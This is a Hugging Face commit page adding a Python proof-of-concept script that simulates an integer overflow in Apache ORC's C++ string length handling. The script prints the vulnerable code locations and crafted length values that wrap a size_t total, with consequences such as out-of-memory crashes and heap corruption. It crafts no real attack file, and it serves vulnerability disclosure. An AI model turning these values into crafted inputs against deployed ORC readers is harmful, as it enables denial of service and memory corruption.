0xiviel committed on
Commit
ecf1516
·
verified ·
1 Parent(s): d31609d

Upload poc_orc_string_overflow.py with huggingface_hub

Browse files
Files changed (1) hide show
  1. poc_orc_string_overflow.py +67 -0
poc_orc_string_overflow.py ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================

Root cause: ColumnReader.cc:697
    totalLength += static_cast<size_t>(lengths[i]);
    // lengths[i] is int64_t from unsigned RLE decoder — NO negative check

String lengths decoded by unsigned RLE (isSigned=false, line 645)
are stored as int64_t. Values >= 2^63 become negative. static_cast<size_t>
on negative int64_t produces huge size_t → OOM or wrap-to-zero.
"""
import struct

# All simulated size_t / uint64 arithmetic below is performed modulo 2**64.
_UINT64_MODULUS = 2**64


def _reinterpret_as_int64(value):
    """Return the signed 64-bit integer sharing the bit pattern of *value*.

    *value* is first reduced modulo 2**64. Explicit little-endian,
    standard-size formats are used so the result does not depend on the
    platform's native struct layout.
    """
    packed = struct.pack('<Q', value % _UINT64_MODULUS)
    return struct.unpack('<q', packed)[0]


def _consequence_lines(total):
    """Return the explanatory lines printed for a simulated ``totalLength``.

    Totals from 1000 through 2**40 inclusive yield no lines, matching the
    three-way classification this script has always used.
    """
    if total == 0:
        return [
            " -> blob.resize(0) -> EMPTY BLOB",
            " -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read",
        ]
    if total < 1000:
        return [
            f" -> blob.resize({total}) -> UNDERSIZED BUFFER",
            " -> actual data > blob size -> HEAP CORRUPTION",
        ]
    if total > 2**40:
        return [f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH"]
    return []


def show_overflow():
    """Print a walkthrough of the described overflow and simulate it.

    For each built-in list of unsigned 64-bit lengths, the lengths are
    summed modulo 2**64 (mimicking accumulation into a 64-bit ``size_t``).
    Each step is printed as uint64 / reinterpreted int64 / size_t, followed
    by the final total and the consequence this script attributes to it.

    Returns:
        None. All results are written to standard output.
    """
    print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
    print("=" * 60)
    print()
    print("Vulnerable code (ColumnReader.cc:691-706):")
    print(" size_t totalLength = 0;")
    print(" for (i = 0; i < numValues; ++i)")
    print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
    print()
    print("How negative lengths occur:")
    print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
    print(" 2. Output stored in int64_t* (line 715-718)")
    print(" 3. uint64 values >= 2^63 become negative int64_t")
    print(" 4. static_cast<size_t>(negative) = huge positive")
    print()

    test_cases = [
        ("OOM DoS: single huge length", [2**63]),
        ("Wrap to 0: two lengths", [2**64 - 1, 1]),
        ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
    ]

    for desc, uint_lengths in test_cases:
        print(f"Case: {desc}")
        total = 0
        for ul in uint_lengths:
            as_int64 = _reinterpret_as_int64(ul)
            as_size_t = ul % _UINT64_MODULUS
            # Wrap exactly like unsigned 64-bit addition would.
            total = (total + as_size_t) % _UINT64_MODULUS
            print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
        print(f" totalLength = {total} ({total:#018x})")
        for line in _consequence_lines(total):
            print(line)
        print()

    print("Additional: Stripe offset overflow (Reader.cc:591)")
    print(" stripeFooterStart = offset + index_length + data_length")
    print(" All uint64 from protobuf, no overflow check")
    print(" -> wraps around -> reads wrong file location")
    print()
    print("ORC C++ has ZERO safe arithmetic in core parsing code")
    print(" Reader.cc: 0 overflow checks in 1830 lines")
    print(" ColumnReader.cc: 0 overflow checks in 1793 lines")


if __name__ == "__main__":
    show_overflow()